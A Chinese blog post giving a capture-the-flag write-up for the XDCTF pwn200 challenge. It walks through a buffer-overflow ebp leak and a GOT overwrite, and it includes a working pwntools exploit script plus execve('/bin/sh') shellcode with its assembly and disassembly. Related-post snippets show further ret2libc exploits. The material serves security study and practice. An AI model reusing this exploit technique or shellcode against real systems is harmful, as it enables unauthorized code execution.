xdctf-pwn200

最新推荐文章于 2021-10-05 20:43:01 发布
最新推荐文章于 2021-10-05 20:43:01 发布
阅读量1.3k 收藏
点赞数
分类专栏: CTF 文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29947311/article/details/69694419
版权

XDCTF (哪一年的忘了)中的一道pwn题

题目地址http://pan.baidu.com/s/1hszHtwo

解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode

首先用ida分析这题的反汇编:

这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会一直打印下去,这样我们只要输入0x40个不为0的字符,就可以泄露出main函数的ebp值,通过main函数的ebp可以计算出任意函数的ebp:

from pwn import *
io = process("./pwn200")

payload1 = "a" * 0x30

io.recvuntil(" are u?\n")

io.send(payload1) # leak the ebp of main

t =io.recvline()[48:54] + '\x00\x00' #获取main函数ebp地址

x = hex(u64(t))

main_ebp_addr = int(x,16)

接下来进入return 后面的那个函数中,观察到dest的指针可以被覆盖,再结合后面的strcpy函数,我们知道我们可以对任意地址执行写操作:

于是我们选择覆盖puts函数的got表为我们可控的buf的栈上地址,这个地址可以通过之前得到的main_ebp_addr:

new_ebp = main_ebp_addr - 0x10 - 0x10 - 0x58 - 0x08  #当前函数的栈底

shellcode_addr = new_ebp - 0x40 + 0x10  #计算shellcode的首地址

接下来就是构造shellcode和查找got表中puts的地址,就可以拿shell了:

puts_got = 0x602028 #cover dest      
shellcode = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05"
junk = "a" * (0x40 - 0x10 - 0x8 - len(shellcode))
payload2 = p64(shellcode_addr)+p64(0)+ shellcode + junk + p64(puts_got)
io.recvline()
io.sendline('0')
io.recvline()
io.send(payload2)
io.interactive()

这里的shellcode是根据https://www.cs.utexas.edu/~bismith/test/syscalls/syscalls64_orig.html这个网址上的syscall来实现的,汇编代码如下:

section .text
global _start
_start:
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
mov rbx,68732f6e69622fH
push rbx
mov rdi,rsp
mov rax,59
syscall

上述代码用:

nasm -f elf64 shellcode.asm

编译成shellcode.o文件后,再用:

 objdump -d shellcode.o

得到二进制代码:

0000000000000000 <_start>:
   0:   48 31 ff                xor    %rdi,%rdi
   3:   48 31 f6                xor    %rsi,%rsi
   6:   48 31 d2                xor    %rdx,%rdx
   9:   48 bb 2f 62 69 6e 2f    movabs $0x68732f6e69622f,%rbx
  10:   73 68 00 
  13:   53                      push   %rbx
  14:   48 89 e7                mov    %rsp,%rdi
  17:   b8 3b 00 00 00          mov    $0x3b,%eax
  1c:   0f 05                   syscall

于是得到shellcode

Vccxx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 975
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
pwn-100(L-CTF-2016)的个人想法(含DynELF的使用)
fzucaicai的博客
02-15 284
DynELF是一个用于动态获取库函数地址的类,可以在程序运行时获取库函数的地址,而不需要提前知道库函数的地址。在这段代码中,是创建一个DynELFleak是一个用于泄漏内存地址中的内容的函数;elf=elf是pwn100程序的ELF对象,用于获取程序中的一些基本信息(如函数地址、数据段地址、代码段地址等)。DynELF类会根据提供的泄漏函数leak中泄漏出来的puts函数地址和程序中的ELF信息,动态计算出libc库的基地址,然后可以使用d.lookup方法根据libc库中的函数名获取该函数的地址。
xdctf2015_pwn200
、moddemod
07-18 247
exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './bof' # p = process(proc_name) p = remote('node3.buuoj.cn', 25483) elf = ELF(proc_name) main_addr = elf.sym['main'] write_plt = elf.plt['write'] write_got = elf.go.
XDCTF2015 PWN200
Bill
03-01 1687
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include &lt;stdio.h&gt; #include &lt;unistd.h&gt; #include &lt;string.h&gt; int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
xdctf2015前20名writeup
10-07
2015年xdctf前20名的writeup,绝对不坑
逆向题目XDCTF5
03-10
2016中国-西安电子科技大学XDCTF网络安全技能大赛之伏羲剑
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 241
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1593
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 642
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 761
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
XDCTF成长记录
weixin_33762130的博客
10-20 97
9.30----国庆第一天前记:这该是一个值得怀念的假期,又一次体验悲喜交加的感觉。在最初忘了自己的初衷,然后又在队友的帮助下,逐渐的回复了自己的信心,一步一步从零到一个小菜鸟。现在是时候写下那时自己的思路以及真实思路的差距,好让在其中学习各种奇淫技巧。(1)第一道题是提示是“help youself”,那时呈现在眼前的是那时海里呈现的思路只有两个,第一查看网页的源码,在源码...
高级ROP
听鬼哥说故事
08-29 4884
高级ROP其实和一般的ROP基本一样,其主要的区别在于它利用了一些比较有意思的gadgets。
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值